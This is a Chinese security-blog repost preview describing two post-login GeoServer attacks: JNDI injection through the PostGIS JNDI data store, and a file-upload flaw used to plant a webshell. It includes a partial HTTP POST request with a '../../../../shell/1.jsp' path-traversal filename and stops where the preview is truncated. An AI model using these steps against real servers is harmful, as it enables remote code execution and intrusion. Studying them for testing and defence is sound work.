专栏名称: F12sec
攻守之道,先立于不败之地而后求胜。
今天看啥  ›  专栏  ›  F12sec

【转载】geoserver漏洞解析以及测试方法

F12sec  · 公众号  ·  · 2024-05-25 10:49
    

文章预览

相信各位师傅在HVV中,都遇到过geoserver系统,但是一般都是弱口令或者信息泄露、SSRF之类的,拿shell的案例不多,下面分享下geoserver系统后台的两种打法。 一、后台JNDI 注 ⼊ 测试版本:Version 2.13.3 数据储存—》添加新的数据存储—》PostGIS (JNDI) —》jndiReferenceName *      使用CB1链,弹个计算器                  二、GeoServer后台文件上传致远程代码执行漏洞 测试版本:Version 2.22.2      修改相对路径为绝对路径,即可愉快的上传webshell了。      我了个去,不解析jsp      换war包用tomcat部署      POST /geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../shell/1.jsp HTTP/1.1 Host: localhost:8080 Content-Length: 370 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"          sec-ch-ua-mobile: ?0 Wicket-FocusedElementId: id39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览